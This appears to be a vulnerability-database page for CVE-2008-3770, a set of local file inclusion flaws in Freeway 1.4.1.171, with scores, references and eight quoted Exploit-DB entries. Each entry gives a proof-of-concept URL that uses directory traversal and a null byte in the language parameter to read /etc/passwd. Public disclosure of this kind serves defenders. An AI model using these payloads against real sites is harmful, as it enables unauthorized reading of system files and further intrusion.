CVE-2008-3770
published 2008-08-22CVE-2008-3770: Multiple directory traversal vulnerabilities in Freeway 1.4.1.171, when register_globals is enabled, allow remote attackers to include and execute arbitrary…
PriorityP336medium6.8CVSS 2.0
AVNACMAuNCPIPAP
EXPLOIT
EPSS
2.39%
81.8th percentile
Multiple directory traversal vulnerabilities in Freeway 1.4.1.171, when register_globals is enabled, allow remote attackers to include and execute arbitrary local files via a .. (dot dot) in the language parameter to (1) includes/events_application_top.php; (2) english/account.php, (3) french/account.php, and (4) french/account_newsletters.php in includes/languages/; (5) includes/modules/faqdesk/faqdesk_article_require.php; (6) includes/modules/newsdesk/newsdesk_article_require.php; (7) card1.php, (8) loginbox.php, and (9) whos_online.php in templates/Freeway/boxes/; and (10) templates/Freeway/mainpage_modules/mainpage.php. NOTE: vector 1 may be the same as CVE-2008-3677.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| openfreeway | freeway | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Freeway 1.4.1.171 - '/includes/modules/newsdesk/newsdesk_article_require.php?language' Traversal Local File Inclusion
exploitdb·2008-08-18
CVE-2008-3770 Freeway 1.4.1.171 - '/includes/modules/newsdesk/newsdesk_article_require.php?language' Traversal Local File Inclusion
Freeway 1.4.1.171 - '/includes/modules/newsdesk/newsdesk_article_require.php?language' Traversal Local File Inclusion
---
source: https://www.securityfocus.com/bid/30731/info
Freeway is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker can exploit these vulnerabilities using directory-traversal strings to view local files in the context of the webserver process. This may aid in further attacks.
Freeway 1.4.1.171 is vulnerable; other versions may also be affected.
http://www.example.com/[installdir]/includes/modules/newsdesk/newsdesk_article_require.php?language=../../../../../../../../../../../../../etc/passwd%00
Exploit-DB
Freeway 1.4.1.171 - '/templates/Freeway/boxes/whos_online.php?language' Traversal Local File Inclusion
exploitdb·2008-08-18
CVE-2008-3770 Freeway 1.4.1.171 - '/templates/Freeway/boxes/whos_online.php?language' Traversal Local File Inclusion
Freeway 1.4.1.171 - '/templates/Freeway/boxes/whos_online.php?language' Traversal Local File Inclusion
---
source: https://www.securityfocus.com/bid/30731/info
Freeway is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker can exploit these vulnerabilities using directory-traversal strings to view local files in the context of the webserver process. This may aid in further attacks.
Freeway 1.4.1.171 is vulnerable; other versions may also be affected.
http://www.example.com/[installdir]/templates/Freeway/boxes/whos_online.php?language=../../../../../../../../../../../../../etc/passwd%00
Exploit-DB
Freeway 1.4.1.171 - '/templates/Freeway/boxes/card1.php?language' Traversal Local File Inclusion
exploitdb·2008-08-18
CVE-2008-3770 Freeway 1.4.1.171 - '/templates/Freeway/boxes/card1.php?language' Traversal Local File Inclusion
Freeway 1.4.1.171 - '/templates/Freeway/boxes/card1.php?language' Traversal Local File Inclusion
---
source: https://www.securityfocus.com/bid/30731/info
Freeway is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker can exploit these vulnerabilities using directory-traversal strings to view local files in the context of the webserver process. This may aid in further attacks.
Freeway 1.4.1.171 is vulnerable; other versions may also be affected.
http://www.example.com/[installdir]/templates/Freeway/boxes/card1.php?language=../../../../../../../../../../../../../etc/passwd%00
Exploit-DB
Freeway 1.4.1.171 - '/english/account.php?language' Traversal Local File Inclusion
exploitdb·2008-08-18
CVE-2008-3770 Freeway 1.4.1.171 - '/english/account.php?language' Traversal Local File Inclusion
Freeway 1.4.1.171 - '/english/account.php?language' Traversal Local File Inclusion
---
source: https://www.securityfocus.com/bid/30731/info
Freeway is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker can exploit these vulnerabilities using directory-traversal strings to view local files in the context of the webserver process. This may aid in further attacks.
Freeway 1.4.1.171 is vulnerable; other versions may also be affected.
http://www.example.com/[installdir]/includes/languages/english/account.php?language=../../../../../../../../../../../../../etc/passwd%00
Exploit-DB
Freeway 1.4.1.171 - '/includes/modules/faqdesk/faqdesk_article_require.php?language' Traversal Local File Inclusion
exploitdb·2008-08-18
CVE-2008-3770 Freeway 1.4.1.171 - '/includes/modules/faqdesk/faqdesk_article_require.php?language' Traversal Local File Inclusion
Freeway 1.4.1.171 - '/includes/modules/faqdesk/faqdesk_article_require.php?language' Traversal Local File Inclusion
---
source: https://www.securityfocus.com/bid/30731/info
Freeway is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker can exploit these vulnerabilities using directory-traversal strings to view local files in the context of the webserver process. This may aid in further attacks.
Freeway 1.4.1.171 is vulnerable; other versions may also be affected.
http://www.example.com/[installdir]/includes/modules/faqdesk/faqdesk_article_require.php?language=../../../../../../../../../../../../../etc/passwd%00
Exploit-DB
Freeway 1.4.1.171 - '/french/account_newsletters.php?language' Traversal Local File Inclusion
exploitdb·2008-08-18
CVE-2008-3770 Freeway 1.4.1.171 - '/french/account_newsletters.php?language' Traversal Local File Inclusion
Freeway 1.4.1.171 - '/french/account_newsletters.php?language' Traversal Local File Inclusion
---
source: https://www.securityfocus.com/bid/30731/info
Freeway is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker can exploit these vulnerabilities using directory-traversal strings to view local files in the context of the webserver process. This may aid in further attacks.
Freeway 1.4.1.171 is vulnerable; other versions may also be affected.
http://www.example.com/[installdir]/includes/languages/french/account_newsletters.php? language=../../../../../../../../../../../../../etc/passwd%00
Exploit-DB
Freeway 1.4.1.171 - '/templates/Freeway/boxes/loginbox.php?language' Traversal Local File Inclusion
exploitdb·2008-08-18
CVE-2008-3770 Freeway 1.4.1.171 - '/templates/Freeway/boxes/loginbox.php?language' Traversal Local File Inclusion
Freeway 1.4.1.171 - '/templates/Freeway/boxes/loginbox.php?language' Traversal Local File Inclusion
---
source: https://www.securityfocus.com/bid/30731/info
Freeway is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker can exploit these vulnerabilities using directory-traversal strings to view local files in the context of the webserver process. This may aid in further attacks.
Freeway 1.4.1.171 is vulnerable; other versions may also be affected.
http://www.example.com/[installdir]/templates/Freeway/boxes/loginbox.php?language=../../../../../../../../../../../../../etc/passwd%00
Exploit-DB
Freeway 1.4.1.171 - '/templates/Freeway/mainpage_modules/mainpage.php?language' Traversal Local File Inclusion
exploitdb·2008-08-18
CVE-2008-3770 Freeway 1.4.1.171 - '/templates/Freeway/mainpage_modules/mainpage.php?language' Traversal Local File Inclusion
Freeway 1.4.1.171 - '/templates/Freeway/mainpage_modules/mainpage.php?language' Traversal Local File Inclusion
---
source: https://www.securityfocus.com/bid/30731/info
Freeway is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker can exploit these vulnerabilities using directory-traversal strings to view local files in the context of the webserver process. This may aid in further attacks.
Freeway 1.4.1.171 is vulnerable; other versions may also be affected.
http://www.example.com/[installdir]/templates/Freeway/mainpage_modules/mainpage.php?language=../../../../../../../../../../../../../etc/passwd%00
No writeups or analysis indexed.
http://secunia.com/advisories/31475http://securityreason.com/securityalert/4181http://www.openfreeway.org/download/change-log.htmlhttp://www.securityfocus.com/archive/1/495549/100/0/threadedhttp://www.securityfocus.com/bid/30731https://exchange.xforce.ibmcloud.com/vulnerabilities/45037http://secunia.com/advisories/31475http://securityreason.com/securityalert/4181http://www.openfreeway.org/download/change-log.htmlhttp://www.securityfocus.com/archive/1/495549/100/0/threadedhttp://www.securityfocus.com/bid/30731https://exchange.xforce.ibmcloud.com/vulnerabilities/45037
2008-08-22
Published